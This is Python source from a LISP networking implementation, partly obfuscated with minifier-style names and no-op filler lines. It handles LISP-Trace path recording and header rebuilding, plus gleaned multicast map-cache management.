if 91 - 91: Ii1I
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
                        rloc_entry = None ) :
    """
    Append this node's path record to the JSON body of a LISP-Trace packet
    and rebuild the packet headers around the grown payload.

    Returns True when the caller should continue forwarding the packet,
    False when the packet was consumed (JSON could not be decoded, or the
    destination RLOC is unknown and the trace was returned to the sender).

    'ed' is "encap" or "decap" and selects which timestamp key is written.
    'rloc_entry', when supplied, contributes RLOC-probe RTT/hop history.
    """
    if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o

    #
    # Offset to the LISP-Trace JSON payload past the inner IP+UDP headers
    # (28 = 20-byte IPv4 + 8-byte UDP, 48 = 40-byte IPv6 + 8-byte UDP).
    #
    i1 = 28 if packet . inner_version == 4 else 48
    IIii1I11IIII = packet . packet [ i1 : : ]
    iIi111I1 = lisp_trace ( )
    if ( iIi111I1 . decode ( IIii1I11IIII ) == False ) :
        lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
        return ( False )
    if 16 - 16: ooOoO0o
    if 49 - 49: o0oOOo0O0Ooo + o0oOOo0O0Ooo . OOooOOo - OoooooooOO

    #
    # Destination RLOC this packet encapsulates to; "?" when the outer
    # destination is unset (no map-cache answer yet).
    #
    OO0Oii1I1 = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
    if 62 - 62: oO0o / O0 - I1Ii111 . IiII
    if 81 - 81: i11iIiiIii
    if 57 - 57: O0
    if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
    if 4 - 4: I1ii11iIi11i * O0 / OoO0O00 * II111iiii . iIii1I11I1II1 / OOooOOo
    if 97 - 97: i1IIi - OoOoOO00 . OoooooooOO

    #
    # Show the translated encap port on the encap side when it is not the
    # well-known LISP data port (i.e. the RLOC is behind a NAT).
    #
    if ( OO0Oii1I1 != "?" and packet . encap_port != LISP_DATA_PORT ) :
        if ( ed == "encap" ) : OO0Oii1I1 += ":{}" . format ( packet . encap_port )
    if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
    if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
    if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
    if 50 - 50: iII111i * O0 % II111iiii
    if 80 - 80: OOooOOo - II111iiii - OoO0O00

    #
    # Build this node's path record: node role, source RLOC, hostname and
    # an encap/decap timestamp.
    #
    iIiiiIIiii = { }
    iIiiiIIiii [ "node" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
    if 62 - 62: Ii1I . i11iIiiIii % OOooOOo
    Ii1Ii111I1ii1 = packet . outer_source
    # No outer source yet (locally sourced) -> use our own first RLOC.
    if ( Ii1Ii111I1ii1 . is_null ( ) ) : Ii1Ii111I1ii1 = lisp_myrlocs [ 0 ]
    iIiiiIIiii [ "srloc" ] = Ii1Ii111I1ii1 . print_address_no_iid ( )
    if 59 - 59: I11i - I1IiiI
    if 95 - 95: OoOoOO00 + I1IiiI + iII111i
    if 15 - 15: Oo0Ooo - I1IiiI % OoO0O00 % iIii1I11I1II1 + O0 - II111iiii
    if 96 - 96: OoooooooOO
    if 1 - 1: oO0o * II111iiii + i1IIi * oO0o % I1IiiI

    #
    # On the ITR, record the client's source port unless it is the
    # LISP-Trace port itself.
    #
    if ( iIiiiIIiii [ "node" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
        iIiiiIIiii [ "srloc" ] += ":{}" . format ( packet . inner_sport )
    if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
    if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
    iIiiiIIiii [ "hn" ] = lisp_hostname
    # Timestamp key is "encap-ts" or "decap-ts" depending on direction.
    iII1 = ed + "-ts"
    iIiiiIIiii [ iII1 ] = lisp_get_timestamp ( )
    if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
    if 79 - 79: IiII + I1Ii111
    if 59 - 59: iII111i - oO0o . ooOoO0o / IiII * i11iIiiIii
    if 61 - 61: I11i - Oo0Ooo * II111iiii + iIii1I11I1II1
    if 37 - 37: OoooooooOO % II111iiii / o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i . iIii1I11I1II1
    if 73 - 73: OoOoOO00

    #
    # On the ETR the outer destination is unknown; take the destination
    # RLOC from our own database-mapping for the inner destination EID.
    #
    if ( OO0Oii1I1 == "?" and iIiiiIIiii [ "node" ] == "ETR" ) :
        o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
        if ( o00o0oOo0o0O != None and len ( o00o0oOo0o0O . rloc_set ) >= 1 ) :
            OO0Oii1I1 = o00o0oOo0o0O . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
    if 44 - 44: Oo0Ooo / oO0o
    if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
    iIiiiIIiii [ "drloc" ] = OO0Oii1I1
    if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
    if 53 - 53: OOooOOo + i11iIiiIii
    if 25 - 25: i11iIiiIii
    if 51 - 51: iII111i . ooOoO0o

    # Annotate an unknown destination RLOC with the caller-supplied reason.
    if ( OO0Oii1I1 == "?" and reason != None ) :
        iIiiiIIiii [ "drloc" ] += " ({})" . format ( reason )
    if 70 - 70: I11i / O0 - I11i + o0oOOo0O0Ooo . ooOoO0o . o0oOOo0O0Ooo
    if 6 - 6: I11i + II111iiii - I1Ii111
    if 45 - 45: i1IIi / iII111i + i11iIiiIii * I11i + ooOoO0o / OoooooooOO
    if 56 - 56: I11i + I1Ii111
    if 80 - 80: II111iiii . Ii1I + o0oOOo0O0Ooo / II111iiii / OoO0O00 + iIii1I11I1II1

    # Include recent RLOC-probe RTT and hop-count history when available.
    if ( rloc_entry != None ) :
        iIiiiIIiii [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
        iIiiiIIiii [ "hops" ] = rloc_entry . recent_rloc_probe_hops
    if 29 - 29: o0oOOo0O0Ooo + OoOoOO00 + ooOoO0o - I1ii11iIi11i
    if 64 - 64: O0 / OoooooooOO
    if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
    if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
    if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
    if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00

    #
    # First node on the path: seed the JSON with a (seid, deid, paths)
    # record for the forward direction.
    #
    Oooo0OOO0oo0o = packet . inner_source . print_address ( )
    OOOoOO0o00o0o = packet . inner_dest . print_address ( )
    if ( iIi111I1 . packet_json == [ ] ) :
        O00oOO = { }
        O00oOO [ "seid" ] = Oooo0OOO0oo0o
        O00oOO [ "deid" ] = OOOoOO0o00o0o
        O00oOO [ "paths" ] = [ ]
        iIi111I1 . packet_json . append ( O00oOO )
    if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
    if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
    if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
    if 77 - 77: OoO0O00
    if 95 - 95: II111iiii
    if 59 - 59: iIii1I11I1II1 % OOooOOo / OoOoOO00 * I1Ii111 * OoooooooOO * O0

    #
    # Append this node's path record to the direction (deid) the packet is
    # currently travelling in.
    #
    for O00oOO in iIi111I1 . packet_json :
        if ( O00oOO [ "deid" ] != OOOoOO0o00o0o ) : continue
        O00oOO [ "paths" ] . append ( iIiiiIIiii )
        break
    if 43 - 43: OoO0O00 * I1IiiI * OOooOOo * O0 - O0 / o0oOOo0O0Ooo
    if 77 - 77: I11i % I1Ii111 . IiII % OoooooooOO * o0oOOo0O0Ooo
    if 87 - 87: iII111i + IiII / ooOoO0o * ooOoO0o * OOooOOo
    if 97 - 97: I1Ii111
    if 47 - 47: iII111i / I1ii11iIi11i - Ii1I . II111iiii
    if 56 - 56: O0 - i1IIi % o0oOOo0O0Ooo + IiII
    if 42 - 42: o0oOOo0O0Ooo . OOooOOo % I11i - OoOoOO00
    if 38 - 38: OoooooooOO

    #
    # Destination ETR owns the inner destination EID: start the return
    # direction record (seid/deid reversed) and remember to swap the inner
    # addresses below.
    #
    Ii1Ii1I = False
    if ( len ( iIi111I1 . packet_json ) == 1 and iIiiiIIiii [ "node" ] == "ETR" and
         iIi111I1 . myeid ( packet . inner_dest ) ) :
        O00oOO = { }
        O00oOO [ "seid" ] = OOOoOO0o00o0o
        O00oOO [ "deid" ] = Oooo0OOO0oo0o
        O00oOO [ "paths" ] = [ ]
        iIi111I1 . packet_json . append ( O00oOO )
        Ii1Ii1I = True
    if 21 - 21: OoOoOO00 + IiII / I1IiiI
    if 29 - 29: ooOoO0o / iIii1I11I1II1 - I1IiiI
    if 93 - 93: OOooOOo
    if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
    if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
    if 37 - 37: O0 + IiII + I1IiiI

    # Log the trace so far and re-encode the (now larger) JSON payload.
    iIi111I1 . print_trace ( )
    IIii1I11IIII = iIi111I1 . encode ( )
    if 50 - 50: OoooooooOO . I1Ii111
    if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
    if 13 - 13: iII111i . I11i * OoO0O00 . i1IIi . iIii1I11I1II1 - o0oOOo0O0Ooo
    if 68 - 68: Ii1I % o0oOOo0O0Ooo / OoooooooOO + Ii1I - Ii1I
    if 79 - 79: II111iiii / IiII
    if 4 - 4: O0 - i11iIiiIii % ooOoO0o * O0 - ooOoO0o
    if 96 - 96: oO0o % II111iiii . Ii1I % OoO0O00 . iIii1I11I1II1 / IiII
    if 96 - 96: o0oOOo0O0Ooo / O0 . iIii1I11I1II1 . Ii1I % OOooOOo % II111iiii

    #
    # Destination RLOC still unknown: send the trace back to the very
    # first srloc on the recorded path and stop forwarding.
    #
    Ii11i = iIi111I1 . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "srloc" ]
    if ( OO0Oii1I1 == "?" ) :
        lprint ( "LISP-Trace return to sender RLOC {}" . format ( Ii11i ) )
        iIi111I1 . return_to_sender ( lisp_socket , Ii11i , IIii1I11IIII )
        return ( False )
    if 93 - 93: I1Ii111 / o0oOOo0O0Ooo
    if 33 - 33: OOooOOo * IiII * OoO0O00 - I1ii11iIi11i % OoO0O00
    if 16 - 16: OoO0O00 * I1IiiI
    if 58 - 58: oO0o * II111iiii * O0
    if 89 - 89: I1Ii111 + IiII % I1ii11iIi11i
    if 80 - 80: Oo0Ooo + ooOoO0o + IiII

    # New UDP payload length (UDP header + JSON).
    ii1I = iIi111I1 . packet_length ( )
    if 76 - 76: I1Ii111
    if 23 - 23: O0 % I1ii11iIi11i % iIii1I11I1II1
    if 49 - 49: iII111i + I1Ii111 % OoOoOO00
    if 67 - 67: Ii1I
    if 27 - 27: Oo0Ooo / i11iIiiIii / II111iiii . Ii1I - II111iiii / OoO0O00
    if 61 - 61: ooOoO0o - OOooOOo

    #
    # Rewrite the last 4 bytes of the inner UDP header: new length and a
    # zeroed checksum.
    #
    iiIo0OoOO = packet . packet [ 0 : i1 ]
    iIiiI11II11 = struct . pack ( "HH" , socket . htons ( ii1I ) , 0 )
    iiIo0OoOO = iiIo0OoOO [ 0 : i1 - 4 ] + iIiiI11II11

    #
    # IPv6 requires a real UDP checksum; compute it on the ETR once both
    # direction records exist.
    #
    if ( packet . inner_version == 6 and iIiiiIIiii [ "node" ] == "ETR" and
         len ( iIi111I1 . packet_json ) == 2 ) :
        O0OO0ooO00 = iiIo0OoOO [ i1 - 8 : : ] + IIii1I11IIII
        O0OO0ooO00 = lisp_udp_checksum ( Oooo0OOO0oo0o , OOOoOO0o00o0o , O0OO0ooO00 )
        iiIo0OoOO = iiIo0OoOO [ 0 : i1 - 8 ] + O0OO0ooO00 [ 0 : 8 ]
    if 90 - 90: oO0o + iIii1I11I1II1 % i1IIi - OoooooooOO . Ii1I
    if 91 - 91: iII111i - i11iIiiIii
    if 27 - 27: iII111i
    if 66 - 66: O0 . iIii1I11I1II1 * II111iiii * OOooOOo * IiII
    if 44 - 44: i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo + I1ii11iIi11i + Ii1I
    if 43 - 43: i1IIi . iIii1I11I1II1

    #
    # Turning the packet around: swap IP source/destination addresses and
    # UDP ports in the raw header, then swap the parsed inner addresses.
    #
    if ( Ii1Ii1I ) :
        if ( packet . inner_version == 4 ) :
            iiIo0OoOO = iiIo0OoOO [ 0 : 12 ] + iiIo0OoOO [ 16 : 20 ] + iiIo0OoOO [ 12 : 16 ] + iiIo0OoOO [ 22 : 24 ] + iiIo0OoOO [ 20 : 22 ] + iiIo0OoOO [ 24 : : ]
            if 86 - 86: OOooOOo + OoOoOO00 - OoO0O00 + i1IIi + iIii1I11I1II1
        else :
            iiIo0OoOO = iiIo0OoOO [ 0 : 8 ] + iiIo0OoOO [ 24 : 40 ] + iiIo0OoOO [ 8 : 24 ] + iiIo0OoOO [ 42 : 44 ] + iiIo0OoOO [ 40 : 42 ] + iiIo0OoOO [ 44 : : ]
        if 68 - 68: OoOoOO00 . I1IiiI + ooOoO0o - o0oOOo0O0Ooo
        if 62 - 62: Ii1I - OOooOOo
        Ii = packet . inner_dest
        packet . inner_dest = packet . inner_source
        packet . inner_source = Ii
    if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
    if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
    if 68 - 68: I1Ii111 - OoO0O00 % Ii1I + i1IIi . ooOoO0o
    if 36 - 36: oO0o * iIii1I11I1II1 - O0 - IiII * O0 + i11iIiiIii
    if 76 - 76: OoO0O00 % O0 / Ii1I + I1IiiI

    #
    # Fix the IP length field (total length at offset 2 for IPv4, payload
    # length at offset 4 for IPv6).
    #
    i1 = 2 if packet . inner_version == 4 else 4
    iii1IiiII1i = 20 + ii1I if packet . inner_version == 4 else ii1I
    I1IIIIiiii = struct . pack ( "H" , socket . htons ( iii1IiiII1i ) )
    iiIo0OoOO = iiIo0OoOO [ 0 : i1 ] + I1IIIIiiii + iiIo0OoOO [ i1 + 2 : : ]
    if 13 - 13: II111iiii / iIii1I11I1II1
    if 82 - 82: o0oOOo0O0Ooo / ooOoO0o . I1IiiI + ooOoO0o
    if 71 - 71: oO0o + ooOoO0o
    if 87 - 87: ooOoO0o % oO0o

    # IPv4: zero the header checksum field and recompute it.
    if ( packet . inner_version == 4 ) :
        ii1i1 = struct . pack ( "H" , 0 )
        iiIo0OoOO = iiIo0OoOO [ 0 : 10 ] + ii1i1 + iiIo0OoOO [ 12 : : ]
        I1IIIIiiii = lisp_ip_checksum ( iiIo0OoOO [ 0 : 20 ] )
        iiIo0OoOO = I1IIIIiiii + iiIo0OoOO [ 20 : : ]
    if 45 - 45: oO0o
    if 95 - 95: iII111i * iIii1I11I1II1 . i1IIi
    if 43 - 43: oO0o * ooOoO0o - I11i
    if 70 - 70: oO0o / Ii1I
    if 15 - 15: iIii1I11I1II1 % ooOoO0o % i11iIiiIii

    # Reassemble headers + JSON and let the caller forward the packet.
    packet . packet = iiIo0OoOO + IIii1I11IIII
    return ( True )
if 16 - 16: iII111i
if 50 - 50: iIii1I11I1II1 - II111iiii % i1IIi
if 48 - 48: O0
if 60 - 60: ooOoO0o - IiII % i1IIi
if 5 - 5: oO0o
if 29 - 29: i1IIi . OoOoOO00 . i1IIi + oO0o . I1Ii111 + O0
if 62 - 62: I1ii11iIi11i . IiII + OoO0O00 - OoOoOO00 * O0 + I1Ii111
if 58 - 58: oO0o . OoO0O00 / ooOoO0o
if 61 - 61: I11i + I1Ii111
if 27 - 27: ooOoO0o / i1IIi . oO0o - OoooooooOO
def lisp_allow_gleaning(eid, group, rloc):
    """
    Check the configured 'lisp_glean_mappings' policy entries to decide
    whether this EID/group/RLOC combination may be gleaned.

    Returns a 3-tuple (glean?, rloc-probe?, igmp-query?) taken from the
    first matching entry, or (False, False, False) when nothing matches.
    """
    if lisp_glean_mappings == []: return (False, False, False)

    for entry in lisp_glean_mappings:

        #
        # Instance-ID is stored as an inclusive [low, high] range.
        # (dict.has_key() was Python-2-only; use the 'in' operator.)
        #
        if "instance-id" in entry:
            iid = eid.instance_id
            low, high = entry["instance-id"]
            if iid < low or iid > high: continue

        #
        # Copy the configured EID-prefix so we can force its instance-ID
        # to the lookup EID's before the more-specific test.
        #
        if "eid-prefix" in entry:
            prefix = copy.deepcopy(entry["eid-prefix"])
            prefix.instance_id = eid.instance_id
            if eid.is_more_specific(prefix) == False: continue

        if "group-prefix" in entry:
            if group == None: continue
            prefix = copy.deepcopy(entry["group-prefix"])
            prefix.instance_id = group.instance_id
            if group.is_more_specific(prefix) == False: continue

        if "rloc-prefix" in entry:
            if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
                == False): continue

        return (True, entry["rloc-probe"], entry["igmp-query"])

    return (False, False, False)
if 94 - 94: i11iIiiIii + I1Ii111 . iII111i - ooOoO0o % I1Ii111
if 94 - 94: i11iIiiIii - OOooOOo - O0 * OoooooooOO - ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    """
    Create or refresh a gleaned (*, geid) map-cache entry and make sure it
    carries an RLE node for source EID 'seid' pointing at 'rloc':'port'.
    When 'igmp' is True, also record the group membership timestamp in
    'lisp_gleaned_groups'.
    """
    group_str = geid.print_address()
    seid_str = seid.print_address_no_iid()
    seid_log = green("{}".format(seid_str), False)
    eid_log = green("(*, {})".format(group_str), False)
    rloc_log = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Look up (S, G); create a (*, G) entry with a gleaned TTL when it does
    # not exist yet.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if mc == None:
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(eid_log))

    #
    # Find the existing RLOC record, its RLE, and the RLE node named after
    # this source EID (if any).
    #
    rloc_entry = rle = rle_node = None
    if mc.rloc_set != []:
        rloc_entry = mc.rloc_set[0]
        if rloc_entry.rle:
            rle = rloc_entry.rle
            for node in rle.rle_nodes:
                if node.rloc_name != seid_str: continue
                rle_node = node
                break

    #
    # Create whatever pieces are missing: RLOC record, RLE, RLE node.
    #
    if rloc_entry == None:
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()

    if rle == None:
        rle = lisp_rle(geid.print_address())
        rloc_entry.rle = rle

    if rle_node == None:
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_str
        rle.rle_nodes.append(rle_node)
        rle.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(rloc_log,
            seid_log, eid_log))
    elif (rloc.is_exact_match(rle_node.address) == False or
          port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(rloc_log,
            seid_log, eid_log))

    #
    # Always (re)store the translated RLOC/port on the node.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # Remember the group join for this source EID so IGMP state can be
    # timed out later.  (has_key() replaced with 'in' for Python 3.)
    #
    if igmp:
        seid_addr = seid.print_address()
        if (seid_addr in lisp_gleaned_groups) == False:
            lisp_gleaned_groups[seid_addr] = {}
        lisp_gleaned_groups[seid_addr][group_str] = lisp_get_timestamp()
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
if 90 - 90: II111iiii % I1Ii111 - IiII . Oo0Ooo % OOooOOo - OoOoOO00
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if 65 - 65: ooOoO0o % OOooOOo + OOooOOo % I1Ii111 . I1IiiI % O0
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
if 1 - 1: I1ii11iIi11i % O0 - I1ii11iIi11i / OoooooooOO / OoO0O00
if 82 - 82: i1IIi % Ii1I
if 85 - 85: I1Ii111 * i11iIiiIii * iIii1I11I1II1 % iIii1I11I1II1
def lisp_remove_gleaned_multicast(seid, geid):
    """
    Remove source EID 'seid' from the RLE of the gleaned (*, geid)
    map-cache entry; delete the whole entry when no RLE nodes remain.
    Also clears the group from the 'lisp_gleaned_groups' bookkeeping.
    """
    mc = lisp_map_cache_lookup(seid, geid)
    if mc == None: return

    rle = mc.rloc_set[0].rle
    if rle == None: return

    #
    # Find the RLE node named after this source EID.
    #
    seid_str = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if rle_node.rloc_name == seid_str:
            found = True
            break
    if found == False: return

    #
    # Remove the node and rebuild the replication list.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_addr = seid.print_address()
    seid_log = green("{}".format(seid_addr), False)
    eid_log = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(eid_log, seid_log))

    #
    # Drop group-membership bookkeeping for this source EID.
    # (dict.has_key() was Python-2-only; use the 'in' operator.)
    #
    if seid_addr in lisp_gleaned_groups:
        if group_str in lisp_gleaned_groups[seid_addr]:
            lisp_gleaned_groups[seid_addr].pop(group_str)

    #
    # Last RLE node gone -> the map-cache entry is useless.
    #
    if rle.rle_nodes == []:
        mc.delete_cache()
        lprint("Gleaned EID {} remove, no more RLEs".format(eid_log))
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
if 36 - 36: II111iiii % IiII . i11iIiiIii
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
if 92 - 92: I1IiiI % IiII
if 95 - 95: OoooooooOO / OoO0O00 % O0 / I1Ii111 * Ii1I + I1ii11iIi11i
if 7 - 7: ooOoO0o
def lisp_change_gleaned_multicast(seid, rloc, port):
    """
    The RLOC or encap-port of gleaned source EID 'seid' changed: push the
    new rloc/port into every gleaned (*, G) entry that EID has joined
    (tracked in 'lisp_gleaned_groups').
    """
    seid_str = seid.print_address()
    # has_key() was Python-2-only; 'not in' is the portable equivalent.
    if seid_str not in lisp_gleaned_groups: return

    for group in lisp_gleaned_groups[seid_str]:
        # lisp_geid is a module-level scratch address reused per group.
        lisp_geid.store_address(group)
        lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
if 8 - 8: I11i . I1ii11iIi11i % i1IIi + Ii1I
if 63 - 63: I1IiiI / OoooooooOO
if 16 - 16: OoOoOO00
if 67 - 67: O0 . I1Ii111
if 42 - 42: OoOoOO00 % I1ii11iIi11i * I1Ii111 * i1IIi . i1IIi % OOooOOo
if 90 - 90: oO0o * Oo0Ooo * oO0o . Ii1I * i1IIi
if 47 - 47: OOooOOo
if 38 - 38: I11i
if 15 - 15: OoO0O00 / ooOoO0o . OoO0O00 - iIii1I11I1II1 + OoooooooOO - OoO0O00
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
if 40 - 40: OoO0O00 - IiII
if 43 - 43: I1Ii111 + i11iIiiIii % iII111i % I1Ii111 - ooOoO0o
if 85 - 85: IiII % iIii1I11I1II1 . I1Ii111
if 38 - 38: iII111i - I1IiiI / ooOoO0o
if 46 - 46: OOooOOo . O0 / i11iIiiIii . OOooOOo
if 19 - 19: I11i / Oo0Ooo + I1Ii111
if 43 - 43: I1ii11iIi11i
if 18 - 18: I11i / OOooOOo % I11i - o0oOOo0O0Ooo
if 22 - 22: iII111i
if 88 - 88: I11i + OoOoOO00 % IiII % OoO0O00 * O0 / OoooooooOO
if 83 - 83: IiII + I1Ii111 . I1ii11iIi11i * iIii1I11I1II1
if 9 - 9: ooOoO0o % IiII - OoOoOO00
if 66 - 66: oO0o % Oo0Ooo
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
if 32 - 32: IiII
if 99 - 99: II111iiii
if 34 - 34: OOooOOo + OoOoOO00 * o0oOOo0O0Ooo + I1ii11iIi11i + IiII * i1IIi
if 73 - 73: I1ii11iIi11i - IiII - O0 . oO0o + Oo0Ooo % iII111i
if 68 - 68: I1ii11iIi11i - OoooooooOO
if 5 - 5: I1ii11iIi11i * I1IiiI + OoooooooOO / Oo0Ooo
if 18 - 18: OoO0O00 * iII111i % I1IiiI . OOooOOo * o0oOOo0O0Ooo
if 58 - 58: iII111i . IiII + iIii1I11I1II1
if 13 - 13: oO0o * I1Ii111 / I1Ii111 . I1IiiI
if 93 - 93: I11i % OoOoOO00 - OOooOOo + iIii1I11I1II1 / OoooooooOO % i11iIiiIii
if 90 - 90: oO0o % iIii1I11I1II1 + o0oOOo0O0Ooo - I11i / i11iIiiIii
if 57 - 57: I1IiiI . Oo0Ooo / I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
if 90 - 90: OOooOOo / I1IiiI
if 28 - 28: OoooooooOO + i1IIi
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
if 64 - 64: I1IiiI - I1IiiI
if 90 - 90: iII111i - I1IiiI - II111iiii / OOooOOo + Ii1I
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
if 96 - 96: I1Ii111 / iIii1I11I1II1
if 48 - 48: iII111i * IiII + OoooooooOO
if 63 - 63: I1IiiI / Ii1I
if 31 - 31: i1IIi - oO0o
if 99 - 99: iII111i - i11iIiiIii + oO0o
if 66 - 66: Oo0Ooo * I11i . iIii1I11I1II1 - OoO0O00
if 11 - 11: I1Ii111 + iIii1I11I1II1 * O0 * Oo0Ooo
if 66 - 66: OoooooooOO % OoO0O00 + i11iIiiIii + I1Ii111 % OoO0O00
if 80 - 80: Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if 61 - 61: IiII
if 5 - 5: OOooOOo % iIii1I11I1II1 % O0 * i11iIiiIii / I1Ii111
if 48 - 48: IiII * oO0o
if 53 - 53: i1IIi * iIii1I11I1II1 . OOooOOo
if 68 - 68: IiII % IiII - iII111i . IiII + OoooooooOO
if 82 - 82: Ii1I . II111iiii / i1IIi * OoO0O00
if 80 - 80: I11i
if 96 - 96: i1IIi - I1ii11iIi11i * iII111i . OOooOOo . OoO0O00
if 93 - 93: oO0o * Oo0Ooo * IiII
if 26 - 26: o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . I1IiiI + Oo0Ooo
if 90 - 90: IiII * OoooooooOO + II111iiii / iII111i + i11iIiiIii / ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
